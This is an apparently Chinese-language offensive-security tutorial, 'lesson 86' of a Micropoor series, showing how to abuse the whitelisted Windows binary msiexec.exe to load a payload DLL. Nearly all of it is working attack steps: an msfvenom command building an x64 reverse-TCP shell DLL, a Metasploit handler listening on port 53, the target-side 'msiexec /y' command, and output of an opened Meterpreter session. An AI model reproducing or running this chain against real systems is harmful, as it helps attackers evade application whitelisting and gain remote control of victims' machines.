注:请多喝点热水或者凉白开,身体特别重要。

本季补充本地DLL加载
Msiexec简介:

Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于Windows 2003,Windows 7等。

说明:Msiexec.exe所在路径已被系统添加PATH环境变量中,因此,Msiexec命令可识别。

基于白名单Msiexec.exe配置payload:

注:x64 payload

  1. msfvenom p windows/x64/shell/reverse_tcp LHOST=192.168.1.4 LPORT=53 f dll > Micropoor_rev_x64_53.dll

配置攻击机msf:

注:x64 payload

  1. msf exploit(multi/handler) > show options
  2. Module options (exploit/multi/handler):
  3. Name Current Setting Required Description
  4. ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
  5. Payload options (windows/x64/meterpreter/reverse_tcp):
  6. Name Current Setting Required Description
  7. ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
  8. EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process,none)
  9. LHOST 192.168.1.4 yes The listen address (an interface may be specified)
  10. LPORT 53 yes The listen port
  11. Exploit target:
  12. Id Name
  13. ‐‐ ‐‐‐‐
  14. 0 Wildcard Target
  15. msf exploit(multi/handler) > exploit
  16. [*] Started reverse TCP handler on 192.168.1.4:53

第八十六课:基于白名单Msiexec执行payload第八季补充 - 图1

靶机执行:

  1. msiexec /y C:\Users\John\Desktop\Micropoor_rev_x64_dll.dll

第八十六课:基于白名单Msiexec执行payload第八季补充 - 图2

  1. msf exploit(multi/handler) > exploit
  2. [*] Started reverse TCP handler on 192.168.1.4:53
  3. [*] Sending stage (206403 bytes) to 192.168.1.5
  4. [*] Meterpreter session 26 opened (192.168.1.4:53 ‐> 192.168.1.5:11543)
  5. at 20190120 09:45:51 0500
  6. meterpreter > getuid
  7. Server username: JohnPC\John
  8. meterpreter > getpid
  9. Current pid: 7672
  10. meterpreter >

第八十六课:基于白名单Msiexec执行payload第八季补充 - 图3

Micropoor